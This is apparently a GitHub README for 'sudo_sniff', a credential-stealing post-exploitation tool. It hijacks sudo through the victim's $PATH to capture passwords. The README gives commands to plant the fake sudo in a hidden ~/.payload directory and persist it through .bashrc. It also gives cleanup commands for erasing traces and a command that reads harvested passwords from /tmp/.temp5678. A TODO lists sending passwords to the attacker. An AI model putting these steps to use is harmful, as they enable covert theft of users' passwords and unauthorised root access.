sudo_sniff is a simple program that attempts to steal the user's password while running sudo without arousing any suspicion. The idea is to modify the user's
$PATH in order to hijack sudo when executed by the user. This could be used in post-exploitation as an alternative route for acheiving root acces (given that the user has the correct permissions).
sudo_sniff will store both correct and incorrect password entries at the following location per default:
Hide the victim's input Add function to either send the password to attacker or save it on disk.
- sudo may be in different locations on different systems, perhaps implement a function to locate it
[BUG] When the victim enters his input, the text asking for the password will be printed multiple times.
hunter@nsa:~$ git clone firstname.lastname@example.org:mjdubell/sudo_sniff.git hunter@nsa:~$ cd sudo_sniff/ hunter@nsa:~$ make hunter@nsa:~$ ./sudo whoami
victim@server:~$ mkdir $HOME/.payload victim@server:~$ gcc -Wall -g -o $HOME/.payload/sudo sudo_sniff.c victim@server:~$ echo 'export PATH="$HOME/.payload:$PATH"' >> $HOME/.bashrc
Note: Make sure
sudo is executable.
victim@server:~$ rm -rf $HOME/.payload; rm /tmp/.temp5678; sed '/export PATH="$HOME\/\.payload:$PATH"/d' .bashrc > tmp && mv tmp .bashrc
history will reveal the cleanup command
Retrieve the password
victim@server:~$ cat /tmp/.temp5678 victim:mypasword:ERROR victim:mypassword:SUCCESS
- Fork it!
- Create your feature branch:
git checkout -b my-new-feature
- Commit your changes:
git commit -am 'Add some feature'
- Push to the branch:
git push origin my-new-feature
- Submit a pull request :D